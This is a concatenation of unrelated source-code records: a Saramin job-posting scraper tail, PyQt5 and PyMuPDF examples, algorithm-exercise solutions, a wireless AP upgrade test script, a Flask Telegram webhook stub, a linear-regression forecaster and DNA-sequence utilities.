                       pass    \r\n                    time.sleep(0.1)
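\r\n                    # hover back over the job title so the company-info tooltip closes before the next row is parsed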
\r\n                    ActionChains(driver).move_to_element(title_).perform() # move the mouse back off the company-info element (reset the hover)\r\n                    \r\n                    \r\n                    if len(lst) !=0 and len(lst_1) !=0:\r\n                        result.append([title]+[station]+[date]+[company]+[link]+[career] # save the row\r\n                        + [','.join(work_lst_2)] + [' '.join(lst)] + [' '.join(lst_1[0])] + [search_key])\r\n                    elif len(lst) ==0 and len(lst_1) !=0:\r\n                        result.append([title]+[station]+[date]+[company]+[link]+[career] # save the row\r\n                        + [','.join(work_lst_2)] + ['no revenue info'] + [' '.join(lst_1[0])] + [search_key])\r\n                    elif len(lst) !=0 and len(lst_1) ==0:\r\n                        result.append([title]+[station]+[date]+[company]+[link]+[career] # save the row\r\n                        + [','.join(work_lst_2)] + [' '.join(lst)] + [('no address info')] + [search_key])\r\n            print(f'{\"=\"*10} finished collecting {search_key} job postings {\"=\"*10}')\r\n\r\n    # =================================== save to file after crawling ==============================================\r\n\r\n#################### save as csv\r\n            df = pd.DataFrame(result, columns=('title','station','date',\r\n                            'company','link','career', 'work', 'machul', 'juso', 'search_key'))\r\n            df.to_csv(f'{search_key}_saramin_copy.csv')\r\n\r\n\r\n#################### save to DB\r\n            # db = SaramDB()\r\n            # db.saram_drop()\r\n            # db.saram_create()\r\n            # for i in result:\r\n            #     db.saram_insert(i[0],i[1],i[2],i[3])\r\n            # db.db_free()\r\n            # driver.close()\r\n        except PermissionError as e:\r\n            print(f'{search_key}_saramin.csv is open. Close it and run the collection again.') # error handling when the file is already open\r\n\r\n\r\n    except InvalidSessionIdException as e:\r\n        print(f'No job postings registered for {search_key}.')","sub_path":"project_2_DataAnalysis_(Saramin)/saramin_c.py","file_name":"saramin_c.py","file_ext":"py","file_size_in_byte":8213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"75455113","text":"import sys\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\n\n\nclass MainWindow(QMainWindow):\n\n    def __init__(self, *args, **kwargs):\n        super(MainWindow, self).__init__(*args, **kwargs)\n\n        self.setWindowTitle('My baby Marion')\n        label = QLabel('October 22')\n        label.setAlignment(Qt.AlignCenter)\n\n        self.setCentralWidget(label)\n\n        # create the tool bar object\n        toolbar = QToolBar('My Tool Bar')\n        self.addToolBar(toolbar)\n        toolbar.setIconSize(QSize(16, 16))\n        # ----------\n\n        button_action = QAction(QIcon('terminal.gif'),\n                                'Terminal Launcher', self)\n        button_action.setStatusTip('Terminal')\n        button_action.triggered.connect(lambda checked: self.onMyToolBarClick('terminal'))\n        button_action.setCheckable(True)\n        toolbar.addAction(button_action)\n        # ---------- Keyboard shortcut\n        # on macOS, Ctrl = Cmd\n        button_action.setShortcut(QKeySequence(\"Ctrl+,\"))\n        # ----------\n\n        # ----------\n\n        toolbar.addSeparator()\n        # ----------\n        button_action2 = QAction(QIcon(\"bug.png\"),\n                                 \"Bug Seeker\", self)\n        button_action2.setStatusTip(\"BUG\")\n        button_action2.triggered.connect(self.onMyToolBarClick)\n        button_action2.setCheckable(True)\n        toolbar.addAction(button_action2)\n        toolbar.addWidget(QLabel(\"Hello\"))\n        toolbar.addWidget(QCheckBox())\n\n        self.setStatusBar(QStatusBar(self))\n\n        # --------------MENU----------------\n\n        menu = self.menuBar()\n\n        file_menu = menu.addMenu(\"&File\")\n        file_menu.addAction(button_action)\n        file_menu.addSeparator()\n        file_menu.addAction(button_action2)\n\n        # ______SUBMENU___________\n\n        sub_menu = file_menu.addMenu(\"Submenu\")\n        sub_menu.addAction(button_action)\n        sub_menu.addAction(button_action2)\n\n    # Custom slot: when connected directly, s receives the action's checked state (a boolean); via the lambda above it is a custom string
\n\n    def onMyToolBarClick(self, s):\n        print('click', s)\n\n\napp = QApplication(sys.argv)\nwindow = MainWindow()\n\n\nwindow.show()\n\n\n# starts the event loop\napp.exec_()\n","sub_path":"tut4_toolbars.py","file_name":"tut4_toolbars.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"507198704","text":"# -*- encoding: utf-8 -*-\nimport sys\nr_input = sys.stdin.readline\n\nN, M = map(int, r_input().split()) # size of the maze\nmaze = [0] * M\n\nfor i in range(N): # fill row by row (DP)\n    input_maze = list(map(int, r_input().split()))\n    maze[0] += input_maze[0]\n\n    for j in range(1, M):\n        maze[j] = max(maze[j-1], maze[j]) + input_maze[j]\n\nprint(maze[-1])\n","sub_path":"Algorithm/Baekjoon/11048 이동하기/11048.py","file_name":"11048.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"402516401","text":"import fitz\nfrom datetime import date,timedelta\n\nclass Page:\n    def __init__(self, title=\"\",titlex=20,titley=250,titlesize=50,basepdfname=\"\",toclevel=0,links=[]):\n        self.title = title    \n        self.linksets=[]\n        self.pageno=0\n        self.fitzpage=\"\"\n        self.titlecol=fitz.utils.getColor(\"black\")\n        self.titlesize=titlesize\n        self.titlex=titlex\n        self.titley=titley\n        self.basepdfname=basepdfname\n        self.toclevel=toclevel\n        \n        \n    def addLinks(self,*linksets):\n        for linkset in linksets:\n            self.linksets.append(linkset)\n        return self\n\n\n    def render(self,fitzdoc):\n        self.fitzpage=fitzdoc[self.pageno]\n        #render outbound links\n        for linkset in self.linksets:\n            linkset.render(self)\n        #render title\n        self.fitzpage.insert_text((self.titlex,self.titley), self.title,color=self.titlecol, overlay=True,fontsize=self.titlesize)\n\n\n\n\n\nclass Links:\n    #An abstract class to represent a set of outbound links.\n    #\n    #Primary responsibilities are:\n    #1. hold the details of a set of target pages, with text labels for each link\n    #2. render these links when asked on one or more source pages
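\n    #\n    # A sketch of typical use (the page objects here are hypothetical):\n    #   days = LinearLinks(left=20, top=20)\n    #   for day_page, label in zip(day_pages, [\"Mon\", \"Tue\", \"Wed\"]):\n    #       days.addLink(day_page, label)\n    #   some_page.addLinks(days)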
\n    #\n    #This set of links is generally logically grouped - e.g.\n    #you might have a set of links to pages for each day of the week.\n    #This set of links can be rendered on more than one page.\n    def __init__(self):\n        self.pages=[]\n        self.labels={}\n\n\n    def addLink(self,page,label):\n        self.labels[page]=label\n        self.pages.append(page)\n        \n\nclass LinearLinks(Links):\n    # Renders a set of links left to right, or top to bottom,\n    # as a set of boxes, containing centered label text.\n    #\n    # Expects one of left / right to be passed in the constructor\n    # Expects one of top / bottom to be passed in the constructor\n    #\n    # Starting from the point defined by the two elements above,\n    # boxes will be laid out either from the left (if \"left\" is passed)\n    # or from the right (if \"right\" is passed).\n    #\n    # If right is passed, it can either be expressed as a positive number,\n    # in which case it is considered as an absolute x coordinate, or as\n    # a negative number, in which case it is considered as an offset from\n    # the right edge of the document.\n    #\n    # Similarly if bottom is passed and is positive, it is considered as\n    # an absolute y coordinate, but if negative it is considered as \n    # an offset from the page bottom.\n    #\n    # The size of each box can be modified by the width and height args.\n    # Note that if the label text is too large it will simply not be rendered.\n    #\n    # Use flowdirection=\"right\" to choose left to right, \n    # and flowdirection=\"down\" to choose top to bottom.\n    # The fontsize is also controllable.\n    def __init__(self,width=80,height=80,left=\"\",top=\"\",right=\"\",bottom=\"\",flowdirection=\"right\",fontsize=30):\n        super().__init__()\n\n        self.left=left\n        self.top=top\n        self.right=right\n        self.bottom=bottom\n        self.flowdirection=flowdirection\n\n        if (left==\"\" and right==\"\"):\n            raise Exception(\"You must set either left or right starting points\")\n        if (left!=\"\" and right!=\"\"):\n            raise Exception(\"You cannot set both left and right starting points. Choose one\")\n        if (top==\"\" and bottom==\"\"):\n            raise Exception(\"You must set either top or bottom starting points\")\n        if (top!=\"\" and bottom!=\"\"):\n            raise Exception(\"You cannot set both top and bottom starting points. Choose one\")
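\n\n        # box geometry is resolved later, in render(), because negative right/bottom offsets depend on the page size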
Choose one\")\n \n self.width=width\n self.height=height\n self.fontsize=fontsize\n\n\n # Render this set of link boxes onto the passed page\n # This method will automatically display a box as inverse color \n # if the link points back to itself.\n def render(self,page):\n if self.flowdirection==\"right\":\n\n if (self.left!=\"\"):\n l=self.left \n else:\n if (self.right <= 0): #right is expressed as negative offset from right edge\n #take the right edge, substract the passed offset, then start\n l=page.fitzpage.rect.x1+self.right -len(self.pages)*self.width\n\n r=l+self.width\n\n if (self.top!=\"\"):\n t=self.top \n else:\n if (self.bottom <= 0): #bottom is expressed as negative offset from bottom edge\n #self.bottom=page.fitzpage.rect.y1+self.bottom\n t=page.fitzpage.rect.y1+self.bottom -self.height\n b=t+self.height\n else: #flow down from top\n if (self.left!=\"\"):\n l=self.left \n else:\n if (self.right <= 0): #right is expressed as negative offset from right edge\n #take the right edge, substract the passed offset, then start\n l=page.fitzpage.rect.x1+self.right -self.width\n\n r=l+self.width\n\n if (self.top!=\"\"):\n t=self.top \n else:\n if (self.bottom <= 0): #bottom is expressed as negative offset from bottom edge\n #self.bottom=page.fitzpage.rect.y1+self.bottom\n t=page.fitzpage.rect.y1+self.bottom -self.height*len(self.pages)\n b=t+self.height\n\n\n\n\n\n boxcol=fitz.utils.getColor(\"black\")\n\n for target in self.pages :\n\n if (target.pageno==page.pageno):\n textcol=fitz.utils.getColor(\"white\")\n backcol=fitz.utils.getColor(\"black\")\n else:\n textcol=fitz.utils.getColor(\"black\")\n backcol=fitz.utils.getColor(\"white\")\n r1 = fitz.Rect(l, t, r, b)\n textrect = fitz.Rect(l, t+(self.height/2)-(self.fontsize/2*1.33), r, b)\n page.fitzpage.draw_rect(r1,color=boxcol, fill=backcol, overlay=True)\n\n if (self.flowdirection==\"right\"): \n r=r+self.width\n l=l+self.width\n else:\n t=t+self.height\n b=b+self.height\n \n\n\n linkdict = {\n \"kind\": 1,\n \"from\": r1,\n \"page\": target.pageno \n }\n page.fitzpage.insert_link(linkdict)\n\n # this line should use link text\n page.fitzpage.insert_textbox(textrect, f\"{self.labels[target]}\",color=textcol, overlay=True,align=1,fontsize=self.fontsize)\n\n\n\nclass Doc:\n # Represents the output document\n # This class exists primarily to collect the invidual pages, in the correct order.\n # As the intra pdf linking scheme relies on page number, all pages must be known\n # before links are created.\n #\n # Requires the path to a tempate pdf file when created:\n # the first page of this file will be used as the default\n # template for each page created, if the page itself does\n # not have a dedicated template.\n \n def __init__(self,basepdfname):\n self.pages=[]\n self.fitzdoc = fitz.open() \n self.basepdfname=basepdfname\n self.toc=[]\n \n def addPage( self, title=\"\",titlex=20,titley=250,titlesize=50,basepdfname=\"\",toclevel=0,links=[]):\n page=Page(title=title,titlex=titlex,titley=titley,titlesize=titlesize,basepdfname=basepdfname,toclevel=toclevel,links=links)\n self.addPages(page)\n return page\n\n # Add one or more pages into the document.\n # This method will create fitz pages for each doc, however rendering of content\n # is done as a separate pass\n def addPages(self,*pages):\n for page in pages:\n self.pages.append(page)\n page.pageno=len(self.pages)-1\n if (page.basepdfname==\"\"):\n page.basepdf=fitz.open(self.basepdfname)\n else:\n page.basepdf=fitz.open(page.basepdfname)\n #copy tempate into new doc\n 
self.fitzdoc.insert_pdf(page.basepdf, from_page=0, to_page=0,start_at=-1, rotate=-1, links=True, annots=True, show_progress=0, final=1)\n if page.toclevel!=0:\n self.toc.append([page.toclevel,page.title,page.pageno])\n\n \n \n\n # Ask each page to render their own conent- this is done once all pages are added\n # After rendering the document is saved.\n def render(self,outputfilename):\n for page in self.pages:\n page.render(self.fitzdoc);\n self.fitzdoc.set_toc(self.toc, collapse=1)\n self.fitzdoc.save(outputfilename)\n\n\n","sub_path":"notebook_builder.py","file_name":"notebook_builder.py","file_ext":"py","file_size_in_byte":8538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"289264736","text":"# Day old bread\r\n\r\nhow_many = float(input('How many bread do you want to buy? : '))\r\n\r\nregular_price = 3.49\r\ndiscount = 0.60\r\n\r\nresult = how_many * regular_price * discount\r\n\r\nprint(f'Regular price on your order would be: {regular_price*how_many:.2f}$ ')\r\nprint(f'Discount price is {result:.2f}$')","sub_path":"python-workbook-solutions/33.py","file_name":"33.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"211615085","text":"\nfrom random import *\nimport string\n\ndef artikelnummer():\n artikelnummeronderdeel1 = str(randint(0, 9)) + str(randint(0, 9)) + str(randint(0, 9)) + str(randint(0, 9))\n artikelnummeronderdeel2 = str(\"\".join(choice(string.ascii_lowercase) for y in range(3)))\n artikelnummeronderdeel3 = \"\".join(choice(string.ascii_lowercase) for y in range(3))\n artikelnummeronderdeel4=str(randint(0,9))+str(randint(0,9))+str(randint(0,9))+str(randint(0,9))\n x = ord(artikelnummeronderdeel2[0])\n\n if x <= 102 : \n print(\"het nieuwe artikel nummer is : {}-{}-{}-{} microconroller \".format(artikelnummeronderdeel1, artikelnummeronderdeel2,\n artikelnummeronderdeel3, artikelnummeronderdeel4))\n elif x <= 108:\n print(\"het nieuwe artikel nummer is : {}-{}-{}-{} Mini-pc \".format(artikelnummeronderdeel1,\n artikelnummeronderdeel2,\n artikelnummeronderdeel3,\n artikelnummeronderdeel4))\n elif x <=114 :\n print(\"het nieuwe artikel nummer is : {}-{}-{}-{} homeautomation \".format(artikelnummeronderdeel1,\n artikelnummeronderdeel2,\n artikelnummeronderdeel3,\n artikelnummeronderdeel4))\n else:\n print(\"het nieuwe artikel nummer is : {}-{}-{}-{} accessoires \".format(artikelnummeronderdeel1,\n artikelnummeronderdeel2,\n artikelnummeronderdeel3,\n artikelnummeronderdeel4))\n\n\n\n\n return(artikelnummeronderdeel2,artikelnummeronderdeel3,artikelnummeronderdeel1,artikelnummeronderdeel4)\n\n\ni=\"\"\n\n\n","sub_path":"Uitwerkingen Opdrachten OP-1/artikel_01.py","file_name":"artikel_01.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"639920393","text":"#-*- coding: UTF-8 -*-#\n#\n#*******************************************************************************\n# apconfiguration_2.2.2.14_ONE.py\n#\n# Author: zhangjxp\n#\n# Version 1.0.0\n#\n# Copyright (c) 2004-9999 Digital China Networks Co. 
Ltd\n#\n# Features: \n# 2.2.2.14\t分组独立升级Abort测试1\n# 测试目的: \n# 分组手动独立升级AP image的时候,ap处于Code Transfer In Progress和Requested,\n# 管理AC上可以使用wireless ap download abort命令终止AP Image更新进程,\n# 之后管理AC上可以wireless ap download start 重新触发手动独立升级所有ap,\n# ap重启后被AC管理,image版本已经更新成功。\n#*******************************************************************************\n# Change log:\n# - created by zhangjxp 2018.3.30\n#*******************************************************************************\n\n#Package\n\n#Global Definition\n\n#Source files\n\n#Procedure Definition \n\n#Functional Code\n\ntestname = 'apconfiguration_2.2.2.14'\navoiderror(testname)\nprintTimer(testname,'Start','set ap download group-size 1,\\n \\\n abort ap download when ap1 is in Code Transfer In Progress status and ap2 is in Requested status,\\n \\\n ap upgrading is aborted')\n\n###############################################################################\n#Step 1\n#操作\n# 在AC1上为AP1_image_type指定image文件为ap1_standby_build,\n# 在AC1上为AP2_image_type指定image文件为ap2_standby_build,\n# AC1设置每组同时下载image的AP数目为1\n# wireless ap download group-size 1\n# AC1上升级所有管理AP\n# 当一个AP处于Code Transfer In Progress状态,另一个AP处于Requested状态时,\n# AC终止AP升级\n# 预期\n# AP1,Ap2升级失败\n################################################################################\nprintStep(testname,'Step 1',\n 'config ap1_image_type upgrade to ap1_standby_build',\n 'config ap2_image_type upgrade to ap2_standby_build',\n 'wireless ap download group-size 1',\n 'upgrade all aps',\n 'abort ap download when ap1 is in Code Transfer In Progress status and ap2 is in Requested status',\n 'ap1 and ap2 upgrading is aborted')\nres1=res2=1\n#operate\n# 查看AP1和AP2当前的版本号\nap1_version = Get_ap_version(ap1, Ap1cmdtype)\nap2_version = Get_ap_version(ap2, Ap2cmdtype)\n\n# 为防止AP下载image速率过快,捕捉不到预期的状态,对S3端口进行限速,限制AP下载速率\nEnterInterfaceMode(switch3, s3p6)\nSetCmd(switch3, 'bandwidth control 3008')\n\n# 在AC1上为AP1和AP2指定image文件,设置ap download group-size\n# (脚本中先配置AP2再配置AP1,目的是如果AP2和AP1的image type相同时,AP2的配置会被AP1覆盖)\nEnterWirelessMode(switch1)\nSetCmd(switch1, 'wireless ap download image-type',ap2_image_type, ap2_ftpupgrade_standby_path)\nSetCmd(switch1, 'wireless ap download image-type',ap1_image_type, ap1_ftpupgrade_standby_path)\nSetCmd(switch1, 'wireless ap download group-size 1')\n\n# 升级所有管理AP\nEnterEnableMode(switch1)\nSetCmd(switch1,'wireless ap download start')\nIdleAfter(1)\n\n# 检查一个AP处于Code Transfer In Progress状态,另一个AP处于Requested状态\nres1 = CheckSutCmd(switch1,'show wireless ap download', \n check=[('Code Transfer In Progress'),('Requested')],\n retry=10,interval=5,waitflag=False,IC=True)\n \n# 终止AP升级\nEnterEnableMode(switch1)\nSetCmd(switch1,'wireless ap download abort')\n\n# 检查AP升级处于Aborted状态\nres2 = CheckSutCmd(switch1,'show wireless ap download', \n check=[('Download Status','Aborted'),(ap1mac, 'Aborted'),(ap2mac, 'Aborted')],\n retry=5,interval=5,waitflag=False,IC=True)\n \n# 取消S3端口限速\nEnterInterfaceMode(switch3, s3p6)\nSetCmd(switch3, 'no bandwidth control')\n \n# 检查AC1仍然管理AP1和AP2\nres3=CheckSutCmd(switch1,'show wireless ap status', \n check=[(ap1mac,'Managed','Success'),(ap2mac,'Managed','Success')],\n retry=20,interval=5,waitflag=False,IC=True) \n \n# 检查AP1和Ap2版本没有变化\nres4 = check_apversion_after_upgrade(ap1, Ap1cmdtype, ap1_version)\nres5 = check_apversion_after_upgrade(ap2, Ap2cmdtype, ap2_version)\n\n#result\nprintCheckStep(testname, 'Step 1',res1,res2,res3,res4,res5)\n###############################################################################\n#Step 2\n#操作\n# AC1上升级所有管理AP\n# 预期\n# 
AP1,AP2升级成功\n################################################################################\nprintStep(testname,'Step 2',\n 'upgrade all aps',\n 'ap1 and ap2 upgrade successfully',)\nres1=res2=1\n#operate\n# 升级所有管理AP\nEnterEnableMode(switch1)\nSetCmd(switch1,'wireless ap download start')\n\n# 等待升级完成\nIdleAfter(ftp_ap_upgrade_time)\nac_wait_download_finish(switch1)\n\n# check\n# 检查AC1是否重新管理AP1和AP2\nres1=CheckSutCmd(switch1,'show wireless ap status', \n check=[(ap1mac,'Managed','Success'),(ap2mac,'Managed','Success')],\n retry=20,interval=5,waitflag=False,IC=True)\n# 检查AP1和AP2升级成功\nApLogin(ap1)\nApLogin(ap2)\nres2 = check_apversion_after_upgrade(ap1, Ap1cmdtype, ap1_standby_buildnum)\nif ap1_image_type != ap2_image_type:\n res3 = check_apversion_after_upgrade(ap2, Ap2cmdtype, ap2_standby_buildnum)\nelse:\n res3 = check_apversion_after_upgrade(ap2, Ap2cmdtype, ap1_standby_buildnum)\n#result\nprintCheckStep(testname, 'Step 2',res1,res2,res3)\n###############################################################################\n#Step 3\n#操作\n# 在AC1上为AP1_image_type指定image文件为ap1_current_build,\n# 在AC1上为AP2_image_type指定image文件为ap2_current_build,\n# AC1上升级所有管理AP\n# 预期\n# AP1,AP2升级成功\n################################################################################\nprintStep(testname,'Step 3',\n 'config ap1_image_type upgrade to ap1_current_build',\n 'config ap2_image_type upgrade to ap2_current_build',\n 'upgrade all aps',\n 'ap1 and ap2 upgrade successfully',)\n\n#operate\nEnterWirelessMode(switch1)\nSetCmd(switch1, 'wireless ap download image-type',ap2_image_type, ap2_ftpupgrade_current_path)\nSetCmd(switch1, 'wireless ap download image-type',ap1_image_type, ap1_ftpupgrade_current_path)\n# 升级所有管理AP\nEnterEnableMode(switch1)\nSetCmd(switch1,'wireless ap download start')\n# 等待升级完成\nIdleAfter(ftp_ap_upgrade_time)\nac_wait_download_finish(switch1)\n# check\nres1 = CheckSutCmd(switch1,'show wireless ap status', \n check=[(ap1mac,'Managed','Success'),(ap2mac,'Managed','Success')],\n retry=20,interval=5,waitflag=False,IC=True)\nApLogin(ap1)\nApLogin(ap2)\nres2 = check_apversion_after_upgrade(ap1, Ap1cmdtype, ap1_current_buildnum)\nif ap1_image_type != ap2_image_type:\n res3 = check_apversion_after_upgrade(ap2, Ap2cmdtype, ap2_current_buildnum)\nelse:\n res3 = check_apversion_after_upgrade(ap2, Ap2cmdtype, ap1_current_buildnum)\n#result\nprintCheckStep(testname, 'Step 3',res1,res2,res3)\n################################################################################\n# Step 4\n# 操作\n# 恢复默认配置\n################################################################################\nprintStep(testname, 'Step 4',\n 'Recover initial config')\n \n# operate\nEnterWirelessMode(switch1)\nSetCmd(switch1, 'wireless ap download group-size 10')\nSetCmd(switch1, 'no wireless ap download image-type',ap1_image_type)\nSetCmd(switch1, 'no wireless ap download image-type',ap2_image_type)\n#end\nprintTimer(testname, 'End')","sub_path":"autoTests/module/apconfiguration/apconfiguration_2.2.2.14_ONE.py","file_name":"apconfiguration_2.2.2.14_ONE.py","file_ext":"py","file_size_in_byte":7646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"597646250","text":"\"\"\"\nНачиная с числа 1 и двигаясь дальше вправо по часовой\nстрелке, образуется следующая спираль 5 на 5:\n\n21 22 23 24 25\n20 7 8 9 10\n19 6 1 2 11\n18 5 4 3 12\n17 16 15 14 13\n\nМожно убедиться, что сумма чисел в диагоналях равна 101.\nКакова сумма чисел в диагоналях спирали 1001 на 1001,\nобразованной таким же 
способом?\n\"\"\"\nnum, step = 1, 0\nres = set()\nres.add(num)\n\nwhile len(res) < 2001:\n step += 2\n for reply in range(4):\n num += step\n res.add(num)\n\nprint(sum(res))\n","sub_path":"euler028.py","file_name":"euler028.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"183012636","text":" ##WEBHOOK\n\nfrom flask import Flask, request \nimport os\nfrom pprint import pprint as pp\nimport requests\n\napp= Flask(__name__)\n\ntoken = os.getenv('TELEGRAM_TOKEN')\nbase_url = \"https://api.hphk.io/telegram\"\nmy_url= \"https://webhook-soowon.c9users.io\" #c9주소 \n\n # 웹훅을 통해 정보가 들어올 route\n@app.route('/{}'.format(token), methods=['POST'])\ndef telegram(): \n doc = request.get_json()\n pp(doc)\n #어떤메세지가 들어오던 '닥쳐'라고 하는 챗봇\n chat_id = doc[\"message\"][\"chat\"][\"id\"]\n msg= doc[\"message\"][\"text\"]\n #url = \"{}/bot{}/sendMesage?chat_id={}&text={}\".format(base_url,token,chat_id,msg)\n requests.get()\n return '',200 \n\n #웹훅 설정(set webhook) == 텔레그램에게 알리미를 해달라고 하는 것\n@app.route('/setwebhook')\ndef setwebhook(): \n url = \"{}/bot{}/setwebhook?url={}/{}\".format(base_url, token, my_url, token)\n res = requests.get(url)\n return '{}'.format(res), 200 #200 : status code \n\n # 텔레그램이 우리에게 알림을 줄때 사용할 route\n # 만약 특정 유저가 우리 봇으로 메세지를 보내게 되면, \n # 텔레그램이 우리에게 알림을 보내온다.(json)\n\n#@app.route()","sub_path":"WEB/webhook/project/app.1.py","file_name":"app.1.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"587142832","text":"# coding=utf-8\n\n# 线性回归预测时间序列的累计数量\ny = ax+b\n\nimport random\nfrom matrix import Matrix\nimport time\n# 线性回归\ndef linear_regression(data, flavor_list):\n raw = Matrix(data)\n alpha = 0.12\n ntheta = 5\n thetas = []\n remains = []\n for index in range(len(flavor_list)):\n n = int(flavor_list[index].name.split('flavor')[1])\n print('linear regression for flavor%s' % n)\n theta = []\n for i in range(ntheta+1):\n theta.append(random.uniform(0,1))\n theta = Matrix(theta)\n theta.transposition()\n X = []\n for i in range(ntheta, len(data)):\n xline = raw.get_col(n)[i - ntheta:i]\n xline.append(1)\n X.append(xline)\n X = Matrix(X)\n Y = Matrix(raw.get_col(n)[ntheta:])\n Y.transposition()\n # 把最后一组数据存入\n remains.append(xline)\n thetas.append(gradient(X, Y, theta, alpha))\n return thetas, remains\n\n\n# 梯度下降\ndef gradient(X, Y, theta, alpha):\n count = X.rows()\n n = theta.rows()\n lastJ = 0\n for i in range(200):\n temptheta = theta\n for j in range(n):\n MUL = X * temptheta\n SUB = MUL - Y\n SX = Matrix(X.get_col(j))\n SX.transposition()\n Z = SUB.dotmul(SX)\n SUM = 0\n for i in range(Z.rows()):\n SUM = SUM + Z.get_row(i)[0]\n theta.matrix[j][0] = theta.matrix[j][0] - alpha/count*SUM\n J = cost(X,Y,theta)\n if lastJ!=0 and lastJ20:\n # final.append(20)\n # else:\n final.append(sum(n))\n return final","sub_path":"linear_regression.py","file_name":"linear_regression.py","file_ext":"py","file_size_in_byte":3291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"429465854","text":"from codeGenetique import codeGenetique\nimport sys\nimport os.path\n\n\ndef pourcentage(seq): # 6.1 --> DONE\n percent = 100.0 / len(seq)\n nA = float(seq.count(\"A\")) * percent\n print ('A = ' + str(nA) + ' %')\n nC = float(seq.count(\"C\")) * percent\n print ('C = ' + str(nC) + ' %')\n nG = float(seq.count(\"G\")) * percent\n print ('G = ' + str(nG) + ' %')\n nT = 
float(seq.count(\"T\")) * percent\n print ('T = ' + str(nT) + ' %\\n')\n\n\ndef nombreCG(seq): # 6.2 --> DONE\n nombre = float(seq.count(\"CG\"))\n nCG = (nombre / len(seq))\n return [nombre, round(nCG, 1)]\n\n\ndef listeCodons(seq): # 6.3 --> DONE\n result = []\n for i in range(0, len(seq), 3):\n codon = seq[i:i + 3]\n if (len(codon) % 3 != 0):\n break\n result.append(seq[i:i + 3])\n return result\n\n\ndef orf_aux(seq): # 6.4 AUX\n result = []\n start = 'ATG'\n stop = ['TAA', 'TAG', 'TGA']\n begin = False\n for i in range(0, len(seq), 3):\n codon = seq[i:i + 3]\n if (len(codon) % 3 != 0):\n break\n if codon == start and begin is False:\n begin = True\n if not begin:\n continue\n result.append(codon)\n if codon in stop:\n break\n return result\n\n\ndef orfs(seq): # 6.4 --> DONE\n cds = []\n seqs = [seq, complementaire(seq)]\n for s in seqs:\n # print(\"This is the sequence: \" + s)\n for i in range(0, 3):\n # print (\"i = \" + str(i))\n seq_aux = seq[i:len(seq)]\n result = orf_aux(seq_aux)\n # print (\"Result = \", result[0:-1])\n cds.append(result[:])\n return cds\n\n\ndef complementaire(seq): # 6.5 --> DONE\n dic = {\n 'A': 'T',\n 'T': 'A',\n 'C': 'G',\n 'G': 'C'\n }\n result = ''\n for i in seq:\n result += dic[i]\n return result\n\n\ndef traduction(gene): # 6.6 --> DONE\n result = []\n i = 0\n while (i < len(gene)):\n codon = gene[i:i + 3]\n if (len(codon) % 3 != 0):\n break\n result.append(codeGenetique[codon])\n i += 3\n return result\n\n\ndef pourcentageFichier(fichier): # 7.1 --> DONE\n data = newOrder(fichier)\n pourcentage(data)\n\n\ndef newOrder(fichier): # 7.1 AUX\n f = open(fichier, 'r')\n rawData = ''\n for line in f:\n if line.startswith(\">\"):\n continue\n rawData += line\n data = rawData.replace('\\n', '')\n return data\n\n\ndef genes(fichier1, fichier2): # 7.2 --> DONE\n f1 = open(fichier1, 'r')\n genome = newOrder(fichier2)\n next(f1)\n nouveauFichier = 'fasta_' + os.path.basename(fichier1)[0:-4] + '.txt'\n fasta = open(nouveauFichier, 'a+')\n for line in f1:\n replicon = line.split(\"\\t\")[2]\n accesion = line.split(\"\\t\")[3]\n orientation = line.split(\"\\t\")[4]\n identifiant = line.split(\"\\t\")[5]\n data = genome[int(replicon) - 1:int(accesion) - 3]\n if orientation == '-':\n data = data[::-1]\n # Faut chercher ATG?\n # data = orf_aux(data)\n data = ''.join(data)\n # Maintenant on fait le fichier avec format ASTA\n if len(data) != 0:\n fasta.write(\">\" + identifiant + \"\\n\")\n fasta.write(data + \"\\n\")\n fasta.close()\n return nouveauFichier\n\n\ndef pourcentageFASTA(fichier): # 7.3 --> DONE\n f = open(fichier, 'r')\n id = ''\n for line in f:\n if line.startswith(\">\"):\n id += line\n continue\n print(id)\n pourcentage(line)\n id = ''\n\n\ndef writeToFile(fichier, trad, id): # Aux\n nouveauFichier = fichier.replace('fasta', 'fastaProteines')\n f = open(nouveauFichier, 'a+')\n f.write(id + \"\\n\")\n for item in trad:\n f.write(item)\n f.write(\"\\n\\n\")\n return nouveauFichier\n\n\ndef traductionGenes(fichier): # 7.4 --> DONE\n f = open(fichier, 'r')\n id = ''\n for line in f:\n if line.startswith(\">\"):\n id = line\n continue\n trad = traduction(line[0:len(line) - 1])\n nouveauFichier = writeToFile(fichier, trad, id)\n id = ''\n return nouveauFichier\n\n\ndef tailleMoyenne(fichier): # 7.5 --> DONE\n f = open(fichier, 'r')\n proteinCounter = 0\n acc = 0\n for line in f:\n if line.startswith(\">\"):\n proteinCounter += 1\n continue\n # line = line[0:len(line) - 1]\n acc += len(line[0:len(line) - 1])\n taille = acc / proteinCounter\n print(\"Taille 
